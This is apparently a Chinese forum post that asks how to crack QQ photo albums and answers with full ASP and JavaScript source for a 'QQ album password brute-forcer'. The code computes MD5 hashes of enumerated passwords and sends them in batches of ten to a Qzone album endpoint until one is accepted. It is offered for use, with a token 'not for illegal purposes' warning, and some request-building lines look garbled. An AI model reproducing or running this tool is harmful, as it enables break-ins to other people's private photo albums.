跪求一个破解QQ像册的办法.
<html>
<head>
<title>忘qq相册密码(又忘 qq密码了),请用本qq相册密码暴破器(第二版) </title>
<script>
//document.write (MD5("58"))
function MD5(sMessage)
{
function RotateLeft(lValue, iShiftBits)
{
return (lValue<<iShiftBits) | (lValue>>>(32-iShiftBits));
}
function AddUnsigned(lX,lY)
{
var lX4,lY4,lX8,lY8,lResult;
lX8 = (lX & 0x80000000);
lY8 = (lY & 0x80000000);
lX4 = (lX & 0x40000000);
lY4 = (lY & 0x40000000);
lResult = (lX & 0x3FFFFFFF)+(lY & 0x3FFFFFFF);
if (lX4 & lY4) return (lResult ^ 0x80000000 ^ lX8 ^ lY8);
if (lX4 | lY4) {
if (lResult & 0x40000000) return (lResult ^ 0xC0000000 ^ lX8 ^ lY8);
else return (lResult ^ 0x40000000 ^ lX8 ^ lY8);
} else return (lResult ^ lX8 ^ lY8);
}
function F(x,y,z) { return (x & y) | ((~x) & z); }
function G(x,y,z) { return (x & z) | (y & (~z)); }
function H(x,y,z) { return (x ^ y ^ z); }
function I(x,y,z) { return (y ^ (x | (~z))); }
function FF(a,b,c,d,x,s,ac) {
a = AddUnsigned(a, AddUnsigned(AddUnsigned(F(b, c, d), x), ac));
return AddUnsigned(RotateLeft(a, s), b);
}
function GG(a,b,c,d,x,s,ac) {
a = AddUnsigned(a, AddUnsigned(AddUnsigned(G(b, c, d), x), ac));
return AddUnsigned(RotateLeft(a, s), b);
}
function HH(a,b,c,d,x,s,ac) {
a = AddUnsigned(a, AddUnsigned(AddUnsigned(H(b, c, d), x), ac));
return AddUnsigned(RotateLeft(a, s), b);
}
function II(a,b,c,d,x,s,ac) {
a = AddUnsigned(a, AddUnsigned(AddUnsigned(I(b, c, d), x), ac));
return AddUnsigned(RotateLeft(a, s), b);
}
function ConvertToWordArray(sMessage) {
var lWordCount;
var lMessageLength = sMessage.length;
var lNumberOfWords_temp1=lMessageLength + 8;
var lNumberOfWords_temp2=(lNumberOfWords_temp1-(lNumberOfWords_temp1 % 64))/64;
var lNumberOfWords = (lNumberOfWords_temp2+1)*16;
var lWordArray=Array(lNumberOfWords-1);
var lBytePosition = 0;
var lByteCount = 0;
while ( lByteCount < lMessageLength ) {
lWordCount = (lByteCount-(lByteCount % 4))/4;
lBytePosition = (lByteCount % 4)*8;
lWordArray[lWordCount] = (lWordArray[lWordCount] | (sMessage.charCodeAt(lByteCount)<<lBytePosition));
lByteCount++;
}
lWordCount = (lByteCount-(lByteCount % 4))/4;
lBytePosition = (lByteCount % 4)*8;
lWordArray[lWordCount] = lWordArray[lWordCount] | (0x80<<lBytePosition);
lWordArray[lNumberOfWords-2] = lMessageLength<<3;
lWordArray[lNumberOfWords-1] = lMessageLength>>>29;
return lWordArray;
}
function WordToHex(lValue) {
var WordToHexValue="",WordToHexValue_temp="",lByte,lCount;
for (lCount = 0;lCount<=3;lCount++) {
lByte = (lValue>>>(lCount*8)) & 255;
WordToHexValue_temp = "0" + lByte.toString(16);
WordToHexValue = WordToHexValue + WordToHexValue_temp.substr(WordToHexValue_temp.length-2,2);
}
return WordToHexValue;
}
var x=Array();
var k,AA,BB,CC,DD,a,b,c,d
var S11=7, S12=12, S13=17, S14=22;
var S21=5, S22=9 , S23=14, S24=20;
var S31=4, S32=11, S33=16, S34=23;
var S41=6, S42=10, S43=15, S44=21;
// Steps 1 and 2. Append padding bits and length and convert to words
x = ConvertToWordArray(sMessage);
// Step 3. Initialise
a = 0x67452301; b = 0xEFCDAB89; c = 0x98BADCFE; d = 0x10325476;
// Step 4. Process the message in 16-word blocks
for (k=0;k<x.length;k+=16) {
AA=a; BB=b; CC=c; DD=d;
a=FF(a,b,c,d,x[k+0], S11,0xD76AA478);
d=FF(d,a,b,c,x[k+1], S12,0xE8C7B756);
c=FF(c,d,a,b,x[k+2], S13,0x242070DB);
b=FF(b,c,d,a,x[k+3], S14,0xC1BDCEEE);
a=FF(a,b,c,d,x[k+4], S11,0xF57C0FAF);
d=FF(d,a,b,c,x[k+5], S12,0x4787C62A);
c=FF(c,d,a,b,x[k+6], S13,0xA8304613);
b=FF(b,c,d,a,x[k+7], S14,0xFD469501);
a=FF(a,b,c,d,x[k+8], S11,0x698098D8);
d=FF(d,a,b,c,x[k+9], S12,0x8B44F7AF);
c=FF(c,d,a,b,x[k+10],S13,0xFFFF5BB1);
b=FF(b,c,d,a,x[k+11],S14,0x895CD7BE);
a=FF(a,b,c,d,x[k+12],S11,0x6B901122);
d=FF(d,a,b,c,x[k+13],S12,0xFD987193);
c=FF(c,d,a,b,x[k+14],S13,0xA679438E);
b=FF(b,c,d,a,x[k+15],S14,0x49B40821);
a=GG(a,b,c,d,x[k+1], S21,0xF61E2562);
d=GG(d,a,b,c,x[k+6], S22,0xC040B340);
c=GG(c,d,a,b,x[k+11],S23,0x265E5A51);
b=GG(b,c,d,a,x[k+0], S24,0xE9B6C7AA);
a=GG(a,b,c,d,x[k+5], S21,0xD62F105D);
d=GG(d,a,b,c,x[k+10],S22,0x2441453);
c=GG(c,d,a,b,x[k+15],S23,0xD8A1E681);
b=GG(b,c,d,a,x[k+4], S24,0xE7D3FBC8);
a=GG(a,b,c,d,x[k+9], S21,0x21E1CDE6);
d=GG(d,a,b,c,x[k+14],S22,0xC33707D6);
c=GG(c,d,a,b,x[k+3], S23,0xF4D50D87);
b=GG(b,c,d,a,x[k+8], S24,0x455A14ED);
a=GG(a,b,c,d,x[k+13],S21,0xA9E3E905);
d=GG(d,a,b,c,x[k+2], S22,0xFCEFA3F8);
c=GG(c,d,a,b,x[k+7], S23,0x676F02D9);
b=GG(b,c,d,a,x[k+12],S24,0x8D2A4C8A);
a=HH(a,b,c,d,x[k+5], S31,0xFFFA3942);
d=HH(d,a,b,c,x[k+8], S32,0x8771F681);
c=HH(c,d,a,b,x[k+11],S33,0x6D9D6122);
b=HH(b,c,d,a,x[k+14],S34,0xFDE5380C);
a=HH(a,b,c,d,x[k+1], S31,0xA4BEEA44);
d=HH(d,a,b,c,x[k+4], S32,0x4BDECFA9);
c=HH(c,d,a,b,x[k+7], S33,0xF6BB4B60);
b=HH(b,c,d,a,x[k+10],S34,0xBEBFBC70);
a=HH(a,b,c,d,x[k+13],S31,0x289B7EC6);
d=HH(d,a,b,c,x[k+0], S32,0xEAA127FA);
c=HH(c,d,a,b,x[k+3], S33,0xD4EF3085);
b=HH(b,c,d,a,x[k+6], S34,0x4881D05);
a=HH(a,b,c,d,x[k+9], S31,0xD9D4D039);
d=HH(d,a,b,c,x[k+12],S32,0xE6DB99E5);
c=HH(c,d,a,b,x[k+15],S33,0x1FA27CF8);
b=HH(b,c,d,a,x[k+2], S34,0xC4AC5665);
a=II(a,b,c,d,x[k+0], S41,0xF4292244);
d=II(d,a,b,c,x[k+7], S42,0x432AFF97);
c=II(c,d,a,b,x[k+14],S43,0xAB9423A7);
b=II(b,c,d,a,x[k+5], S44,0xFC93A039);
a=II(a,b,c,d,x[k+12],S41,0x655B59C3);
d=II(d,a,b,c,x[k+3], S42,0x8F0CCC92);
c=II(c,d,a,b,x[k+10],S43,0xFFEFF47D);
b=II(b,c,d,a,x[k+1], S44,0x85845DD1);
a=II(a,b,c,d,x[k+8], S41,0x6FA87E4F);
d=II(d,a,b,c,x[k+15],S42,0xFE2CE6E0);
c=II(c,d,a,b,x[k+6], S43,0xA3014314);
b=II(b,c,d,a,x[k+13],S44,0x4E0811A1);
a=II(a,b,c,d,x[k+4], S41,0xF7537E82);
d=II(d,a,b,c,x[k+11],S42,0xBD3AF235);
c=II(c,d,a,b,x[k+2], S43,0x2AD7D2BB);
b=II(b,c,d,a,x[k+9], S44,0xEB86D391);
a=AddUnsigned(a,AA); b=AddUnsigned(b,BB); c=AddUnsigned(c,CC); d=AddUnsigned(d,DD);
}
// Step 5. Output the 128 bit digest
var temp= WordToHex(a)+WordToHex(b)+WordToHex(c)+WordToHex(d);
return temp.toLowerCase();
}
</script>
</head>
<body>
<%
start_wei_shuo=1
end_wei_shuo=12
'密码字典
'大写一般没人用 ch="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@!~^#%$&"
ch=split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z",",")
ch2=split("0,1,2,3,4,5,6,7,8,9",",")
ch3=split("a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z",",")
'--------------------------------------------------
if request("fun")="" then
%>
<script>alert("忘qq相册密码(又忘 qq密码了),请用本qq相册密码暴破器(第二版,警告:不得用于非法目的");
alert("在深夜破更快");
setTimeout("self.location='gogirl.asp?fun=test';",10);</script>
<%
response.end
end if
'----------------------------------------------
sub next_char_index()
aaa=0
for i=1 to session("pwd_now_len")
if session(cstr(i)&"wei_now_char_index")=(session(cstr(i)&"wei_max_index")-1) then
session(cstr(i)&"wei_now_char_index")=0
if i=cint(session("pwd_now_len")) then
if i>=cint(session("pwd_max_len")) then
session("ok_break")=1
session("pwd_now_len")=session("pwd_min_len")
for iiu=1 to 90
session(cstr(iiu)&"wei_now_char_index")=0
next
exit for
end if
session("pwd_now_len")=session("pwd_now_len")+1
session(cstr(session("pwd_now_len"))&"wei_now_char_index")=0
exit for
else
aaa=1
end if
else
session(cstr(i)&"wei_now_char_index")=session(cstr(i)&"wei_now_char_index")+1
exit for
end if
if aaa=0 then exit for
if aaa=1 then aaa=0
next
end sub
'----------------------------------------------
function get_now_pwd()
s=""
for ia=session("pwd_now_len") to 1 step -1
if session(cstr(ia)&"wei_type")="numandstr" then
a=ch(session(cstr(ia)&"wei_now_char_index"))
s=s&a
end if
if session(cstr(ia)&"wei_type")="num" then
a=ch2(session(cstr(ia)&"wei_now_char_index"))
s=s&a
end if
if session(cstr(ia)&"wei_type")="str" then
a=ch3(session(cstr(ia)&"wei_now_char_index"))
s=s&a
end if
next
get_now_pwd=s
exit function
end function
'----------------------------------------------
'main_code---start:
xml_thread_max=10
if session("haved")<>"" then
for w=1 to xml_thread_max
Execute("Set /cgi-bin/qzone/cgi_qzone_view_album?uin=" &session("qq")& "&albumid=" &session("ceid")& "&password=" &request("md"&cstr(w))&" "" " &",False")
Execute("http" &cstr(w) & ".send")
Execute("Set Doc" &cstr(w) & "=Server.CreateObject(""Microsoft.XMLDOM"") ")
Execute("Doc" &cstr(w) & ".Async=False ")
Execute("Doc" &cstr(w) & ".ValidateOnParse=False")
Execute("Doc" &cstr(w) & ".Load(http" &cstr(w) & ".ResponseXML)")
Execute("set root" &cstr(w) & "=Doc" &cstr(w) & ".documentElement")
Execute("set nodelis" &cstr(w) & "=root" &cstr(w) & ".selectnodes(""msg"")")
Execute("nodecount" &cstr(w) & "=nodelis" &cstr(w) & ".length")
next
for ww=1 to xml_thread_max
if eval("nodecount" &cstr(ww) &"=0") then
response.write "<script language=javascript>alert('破解成功,密码为:"&request("mima"&cstr(ww))&"');</script>"
response.end
end if
next
if session("ok_break")=1 then
response.write "<script language=javascript>alert('扫描完成,未发现正确的密码');</script>"
response.end
end if
end if
session("haved")="1"
%>
<script language=javascript>
md1=MD5("<%=get_now_pwd()%>");
mima1="<%=get_now_pwd()%>"
<%call next_char_index%>
md2=MD5("<%=get_now_pwd()%>");
mima2="<%=get_now_pwd()%>"
<%call next_char_index%>
md3=MD5("<%=get_now_pwd()%>");
mima3="<%=get_now_pwd()%>"
<%call next_char_index%>
md4=MD5("<%=get_now_pwd()%>");
mima4="<%=get_now_pwd()%>"
<%call next_char_index%>
md5=MD5("<%=get_now_pwd()%>");
mima5="<%=get_now_pwd()%>"
<%call next_char_index%>
md6=MD5("<%=get_now_pwd()%>");
mima6="<%=get_now_pwd()%>"
<%call next_char_index%>
md7=MD5("<%=get_now_pwd()%>");
mima7="<%=get_now_pwd()%>"
<%call next_char_index%>
md8=MD5("<%=get_now_pwd()%>");
mima8="<%=get_now_pwd()%>"
<%call next_char_index%>
md9=MD5("<%=get_now_pwd()%>");
mima9="<%=get_now_pwd()%>"
<%call next_char_index%>
md10=MD5("<%=get_now_pwd()%>");
mima10="<%=get_now_pwd()%>"
<%call next_char_index%>
setTimeout("self.location='gogirl.asp?fun=test&why=忘qq相册密码(又忘qq密码了),请用本qq相册密码暴破器(第二版)BYqq78780577&md1='+md1+'&md2='+md2+'&md3='+md3+'&md4='+md4+'&md5='+md5+'&md6='+md6+'&md7='+md7+'&md8='+md8+'&md9='+md9+'&md10='+md10+'&mima1='+mima1+'&mima2='+mima2+'&mima3='+mima3+'&mima4='+mima4+'&mima5='+mima5+'&mima6='+mima6+'&mima7='+mima7+'&mima8='+mima8+'&mima9='+mima9+'&mima10='+mima10;",1);
</script>
<%
for io=1 to 5
response.write "<font color=red>正在尝试密码:"&request("mima"&cstr(io))&" ------对应md5:"&request("md"&cstr(io))&"</font><br>"
next
response.write "<br><br><br>正在破的qq为"&session("qq")&"<br>正在破的qq相册的id为"&session("ceid")
response.write "<br>线程数:"
response.write xml_thread_max
response.write "<br><br>说明:忘qq相册密码(又忘qq密码了),请用本qq相册密码暴破器(第二版)"
response.write "<br>HACKER"
response.write "<br><a href=index.asp>返回并重新选其他破解方式</font>"
%>
以上是暴力破解QQ相册的ASP程序源码。自己研究一下吧,破解MD5的。